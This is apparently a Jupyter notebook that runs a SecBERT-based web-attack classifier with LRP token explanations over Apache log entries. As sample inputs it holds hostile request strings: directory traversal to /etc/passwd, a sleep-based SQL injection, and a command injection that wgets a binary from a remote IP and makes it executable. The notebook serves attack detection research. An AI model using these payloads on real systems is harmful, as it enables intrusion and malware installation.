In [1]:
from transformers import BertTokenizer
from BERT_explainability.modules.BERT.ExplanationGenerator import Generator
from BERT_explainability.modules.BERT.BertForSequenceClassification import BertForSequenceClassification
from transformers import BertTokenizer
from BERT_explainability.modules.BERT.ExplanationGenerator import Generator
from transformers import AutoTokenizer

from captum.attr import visualization
import torch
from transformers import AutoTokenizer, AutoModelForMaskedLM, AutoModel
from transformers import BertTokenizer, BertModel

d:\miniconda\envs\datn\lib\site-packages\tqdm\auto.py:21: TqdmWarning: IProgress not found. Please update jupyter and ipywidgets. See https://ipywidgets.readthedocs.io/en/stable/user_install.html
  from .autonotebook import tqdm as notebook_tqdm


In [2]:
model = BertForSequenceClassification.from_pretrained("jackaduma/SecBERT", num_labels=6).to("cuda")
model.eval()
tokenizer = AutoTokenizer.from_pretrained('jackaduma/SecBERT')
# initialize the explanations generator


classifications = ["000 - Normal", '126 - Path Traversal',
               '242 - Code Injection', '274 - HTTP Verb Tampering',
               '66 - SQL Injection', '88 - OS Command Injection']
model.to('cuda')
explanations = Generator(model)

Some weights of BertForSequenceClassification were not initialized from the model checkpoint at jackaduma/SecBERT and are newly initialized: ['classifier.bias', 'classifier.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


In [3]:
checkpoint = torch.load('D:\\Bert_ex\\Transformer-Explainability\\bert_models\\capec\\classifier\\SecBert_6labels_balance.pt')

In [4]:
dict = checkpoint['state_dict']
dict1 = dict.copy()
for name in dict.keys():
  name_new = name.replace('bert_model', 'bert')
  dict1[name_new] = dict[name]
  del dict1[name]

In [5]:
dict2 = model.state_dict()
dict2["bert.embeddings.position_ids"]

tensor([[  0,   1,   2,   3,   4,   5,   6,   7,   8,   9,  10,  11,  12,  13,
          14,  15,  16,  17,  18,  19,  20,  21,  22,  23,  24,  25,  26,  27,
          28,  29,  30,  31,  32,  33,  34,  35,  36,  37,  38,  39,  40,  41,
          42,  43,  44,  45,  46,  47,  48,  49,  50,  51,  52,  53,  54,  55,
          56,  57,  58,  59,  60,  61,  62,  63,  64,  65,  66,  67,  68,  69,
          70,  71,  72,  73,  74,  75,  76,  77,  78,  79,  80,  81,  82,  83,
          84,  85,  86,  87,  88,  89,  90,  91,  92,  93,  94,  95,  96,  97,
          98,  99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111,
         112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125,
         126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139,
         140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153,
         154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167,
         168, 169, 170, 171, 172, 173, 174, 175, 176

In [6]:
dict1["bert.embeddings.position_embeddings.weight"] = dict["bert_model.embeddings.position_embeddings.weight"]
dict1["bert.embeddings.word_embeddings.weight"] = dict["bert_model.embeddings.word_embeddings.weight"]
dict1["classifier.weight"] = dict["linear.weight"]
dict1["classifier.bias"] = dict["linear.bias"]
dict1["bert.embeddings.position_ids"] = dict2["bert.embeddings.position_ids"]

In [7]:
model.load_state_dict(dict1)

<All keys matched successfully>

In [8]:
import tailer
import time

# Đường dẫn đến file log của Apache2
log_file_path = '\\\\wsl.localhost\\Ubuntu-20.04\\var\\log\\apache2\\access.log'

# Hàm để xử lý mỗi dòng log
def process_log_line(log_line, total):
    # Xử lý log ở đây, ví dụ in ra console
    start = log_line.find('"') + 1
    end = log_line.find('HTTP/1.1', start) - 1
    request = log_line[start:end]
    text_batch = [request]
    encoding = tokenizer(text_batch, return_tensors='pt')
    input_ids = encoding['input_ids'].to("cuda")
    attention_mask = encoding['attention_mask'].to("cuda")
    token_type_ids = encoding['token_type_ids'].to("cuda")

    # true class is positive - 1
    true_class = 1
    
    output = torch.nn.functional.sigmoid(model(input_ids=input_ids, attention_mask=attention_mask)[0])
    mask = output > 0.5
    print(mask)
    t = time.time()
    for i in range(0, len(mask[0])):
        if mask[0][i]:
            expl = explanations.generate_LRP(input_ids=input_ids, attention_mask=attention_mask, index=i ,start_layer=0)[0]
            expl = (expl - expl.min()) / (expl.max() - expl.min())
            class_name = classifications[i]
            print(class_name)
            if class_name != "000 - Normal":
                expl *= (-1)
            tokens = tokenizer.convert_ids_to_tokens(input_ids.flatten())
            print([(tokens[j], expl[j].item()) for j in range(len(tokens))])
            vis_data_records = [visualization.VisualizationDataRecord(
                                            expl,
                                            output[0][i],
                                            i,
                                            true_class,
                                            true_class,
                                            1,
                                            tokens,
                                            1)]
            visualization.visualize_text(vis_data_records)
    
    tmp = time.time() - t
    total = total + tmp
    print(f"Thoi gian xu ly: {total}")

# Hàm để theo dõi và xử lý file log
def monitor_apache_log(file_path, total):
    # Mở file log và theo dõi từ cuối file
    with open(file_path, 'r') as file:
        for line in tailer.follow(file):
            # Xử lý mỗi dòng log mới
            
            process_log_line(line, total)
            

In [9]:
total = 0
monitor_apache_log(log_file_path, total)

d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


tensor([[False,  True, False, False, False, False]], device='cuda:0')
tensor([[-6.2464,  5.5444, -6.0257, -6.2556, -6.1894, -5.7497]],
       device='cuda:0', grad_fn=<AddmmBackward0>)
126 - Path Traversal
[('[CLS]', -0.0), ('get', -1.0), ('/', -0.17592573165893555), ('blog', -0.12369970232248306), ('/', -0.19884833693504333), ('wp', -0.1496269553899765), ('-', -0.1584194302558899), ('content', -0.14478403329849243), ('/', -0.1263056844472885), ('plugins', -0.2960941195487976), ('/', -0.21463201940059662), ('.', -0.5383490324020386), ('.', -0.8120407462120056), ('%', -0.27641215920448303), ('2f', -0.28394001722335815), ('.', -0.5336334705352783), ('.', -0.7832252383232117), ('%', -0.23686593770980835), ('2f', -0.22385689616203308), ('.', -0.4483167231082916), ('.', -0.5434538722038269), ('%', -0.23601996898651123), ('2f', -0.38948896527290344), ('.', -0.3959450125694275), ('.', -0.5847582817077637), ('%', -0.2495884746313095), ('2f', -0.2006002962589264), ('.', -0.23875083029270172), (

Thoi gian xu ly: 2.8031442165374756
tensor([[False,  True, False, False, False, False]], device='cuda:0')
tensor([[-6.1906,  5.4534, -6.1677, -6.2099, -5.9952, -6.0295]],
       device='cuda:0', grad_fn=<AddmmBackward0>)


d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


126 - Path Traversal
[('[CLS]', -0.0), ('get', -0.5515520572662354), ('/', -0.2529694736003876), ('blog', -0.1000150740146637), ('/', -0.3834752142429352), ('%', -0.3089827299118042), ('5c', -0.8291848301887512), ('.', -0.5099583864212036), ('.', -0.7051784992218018), ('%', -0.12653174996376038), ('5c', -0.6464319229125977), ('.', -0.640771746635437), ('.', -1.0), ('%', -0.19105906784534454), ('5c', -0.5682580471038818), ('.', -0.46067410707473755), ('.', -0.7462449073791504), ('%', -0.13319131731987), ('5c', -0.5916541814804077), ('.', -0.39964085817337036), ('.', -0.5598267316818237), ('%', -0.14269937574863434), ('5c', -0.6448590755462646), ('.', -0.37756651639938354), ('.', -0.6952279210090637), ('%', -0.210567906498909), ('5c', -0.8555725812911987), ('.', -0.48457956314086914), ('.', -0.6727645993232727), ('%', -0.20419412851333618), ('5c', -0.7191935777664185), ('.', -0.536760687828064), ('.', -0.7582279443740845), ('%', -0.18837618827819824), ('5c', -0.7826495170593262), ('.', -

...

True Label,Predicted Label,Attribution Label,Attribution Score,Word Importance
1,3 (0.99),1,1.00,[CLS] copy / blog / index . php / author / vbe ##ch ##te ##la ##r [SEP]


Thoi gian xu ly: 0.3091411590576172
tensor([[False, False, False,  True, False, False]], device='cuda:0')
tensor([[-5.5716, -5.4192, -5.0914,  4.9618, -5.2596, -5.7000]],
       device='cuda:0', grad_fn=<AddmmBackward0>)
274 - HTTP Verb Tampering
[('[CLS]', -0.0), ('mk', -0.5332071185112), ('##col', -0.3629487156867981), ('/', -1.0), ('blog', -0.11911972612142563), ('/', -0.10653938353061676), ('wp', -0.011036591604351997), ('-', -0.023419450968503952), ('content', -0.0043745217844843864), ('/', -0.024621186777949333), ('themes', -0.00191997189540416), ('/', -0.027271635830402374), ('twenty', -0.0036747530102729797), ('##sevent', -0.0010502418735995889), ('##een', -0.0), ('/', -0.007539034821093082), ('assets', -0.0033153905533254147), ('/', -0.005781093146651983), ('js', -0.006304451264441013), ('[SEP]', -0.0030195238068699837)]


True Label,Predicted Label,Attribution Label,Attribution Score,Word Importance
1,3 (0.99),1,1.00,[CLS] mk ##col / blog / wp - content / themes / twenty ##sevent ##een / assets / js [SEP]


Thoi gian xu ly: 0.3123033046722412


: 

In [21]:
with open('\\\\wsl.localhost\\Ubuntu-20.04\\var\\log\\apache2\\access.log', 'r', encoding='utf-8') as file:
    content = file.readlines()
    for log_line in content:
        start = log_line.find('"') + 1
        end = log_line.find('HTTP/1.1', start) - 1
        request = log_line[start:end]
        print(request)

GET /
GET /icons/ubuntu-logo.png
GET /favicon.ico
GET /
GET /
GET /
GET /etc
GET //blog/wp-content/plugins/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/assets/css
GET /
GET /favicon.ico
GET /
GET /
GET /blog/index.php/2020/04%27+and+0+in+%28select+sleep%2815%29+%29+--+/page
GET /blog/index.php/2020/04%27+and+0+in+%28select+sleep%2815%29+%29+--+/page


In [8]:
text_batch = ["GET /blog/wp-login.php?action=lostpassword%2526zap%253Dzaproxy&redirect_to=%2526zap%253Dzaproxy&user_login=%2526zap%253Dzaproxy&wp-submit=Get%20New%20Password%2526zap%253Dzaproxy"]
encoding = tokenizer(text_batch, return_tensors='pt')
input_ids = encoding['input_ids'].to("cuda")
attention_mask = encoding['attention_mask'].to("cuda")
token_type_ids = encoding['token_type_ids'].to("cuda")

# true class is positive - 1
true_class = 1

# generate an explanation for the input
expl = explanations.generate_LRP(input_ids=input_ids, attention_mask=attention_mask, start_layer=0)[0]
# normalize scores
expl = (expl - expl.min()) / (expl.max() - expl.min())

# get the model classification
output = torch.nn.functional.softmax(model(input_ids=input_ids, attention_mask=attention_mask)[0], dim=-1)
classification = output.argmax(dim=-1).item()
# get class name
class_name = classifications[classification]
print(class_name)
# if the classification is negative, higher explanation scores are more negative
# flip for visualization
if class_name != "000 - Normal":
  expl *= (-1)

tokens = tokenizer.convert_ids_to_tokens(input_ids.flatten())
print([(tokens[i], expl[i].item()) for i in range(len(tokens))])
vis_data_records = [visualization.VisualizationDataRecord(
                                expl,
                                output[0][classification],
                                classification,
                                true_class,
                                true_class,
                                1,
                                tokens,
                                1)]
visualization.visualize_text(vis_data_records)


d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


tensor([[-5.2501, -2.4203, -1.1754, -9.3168, -4.6723,  2.5191]],
       device='cuda:0', grad_fn=<AddmmBackward0>)
88 - OS Command Injection
[('[CLS]', -0.0), ('get', -0.2126152366399765), ('/', -0.046990860253572464), ('blog', -0.06054588779807091), ('/', -0.06874598562717438), ('wp', -0.3390134871006012), ('-', -0.07923879474401474), ('login', -0.02704794332385063), ('.', -0.03650887310504913), ('php', -0.08725671470165253), ('?', -1.0), ('action', -0.18063493072986603), ('=', -0.6331163048744202), ('lostpassword', -0.27086177468299866), ('%', -0.5625048875808716), ('2526', -0.11015615612268448), ('##zap', -0.06665682047605515), ('%', -0.1669461578130722), ('253', -0.060792047530412674), ('##d', -0.04209113493561745), ('##zap', -0.009894244372844696), ('##roxy', -0.007929004728794098), ('&', -0.03832452371716499), ('redirect', -0.028918936848640442), ('_', -0.05401422828435898), ('to', -0.04732371121644974), ('=', -0.5517392158508301), ('%', -0.15541419386863708), ('2526', -0.0118363

d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


In [14]:
text_batch = ["POST /cgi-bin/ViewLog.asp  remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7;chmod+777+Meth"]
encoding = tokenizer(text_batch, return_tensors='pt')
input_ids = encoding['input_ids'].to("cuda")
attention_mask = encoding['attention_mask'].to("cuda")
token_type_ids = encoding['token_type_ids'].to("cuda")

# true class is positive - 1
true_class = 1

# generate an explanation for the input
expl = explanations.generate_LRP(input_ids=input_ids, attention_mask=attention_mask, start_layer=0)[0]
# normalize scores
expl = (expl - expl.min()) / (expl.max() - expl.min())

# get the model classification
output = torch.nn.functional.softmax(model(input_ids=input_ids, attention_mask=attention_mask)[0], dim=-1)
classification = output.argmax(dim=-1).item()
# get class name
class_name = classifications[classification]
print(class_name)
# if the classification is negative, higher explanation scores are more negative
# flip for visualization
if class_name == "272 - Protocol Manipulation":
  expl *= (-1)

tokens = tokenizer.convert_ids_to_tokens(input_ids.flatten())
print([(tokens[i], expl[i].item()) for i in range(len(tokens))])
vis_data_records = [visualization.VisualizationDataRecord(
                                expl,
                                output[0][classification],
                                classification,
                                true_class,
                                true_class,
                                1,
                                tokens,
                                1)]
visualization.visualize_text(vis_data_records)


66 - SQL Injection
[('[CLS]', 0.0), ('post', 0.0049610501155257225), ('/', 0.0326789915561676), ('cgi', 0.016313230618834496), ('-', 0.022789515554904938), ('bin', 0.0015560470055788755), ('/', 0.009821903891861439), ('view', 0.0014764299849048257), ('##log', 0.003533927258104086), ('.', 0.028917063027620316), ('asp', 0.005795755423605442), ('remote', 0.0015421322314068675), ('_', 0.005872561130672693), ('submit', 9.452100493945181e-05), ('_', 0.0035861770156770945), ('flag', 0.0006303424597717822), ('=', 0.006571750156581402), ('1', 0.003091587917879224), ('&', 0.006537690758705139), ('remote', 0.0003858654235955328), ('_', 0.003698438173159957), ('syslog', 0.0008474307251162827), ('_', 0.0034825506154447794), ('flag', 0.0), ('=', 0.00412076385691762), ('1', 0.0026821328792721033), ('&', 0.004178994335234165), ('remote', 0.0005513280048035085), ('##sys', 0.0011589769273996353), ('##logs', 0.001441573491320014), ('##upport', 0.0006265139090828598), ('##ed', 0.00010249739716527984), ('=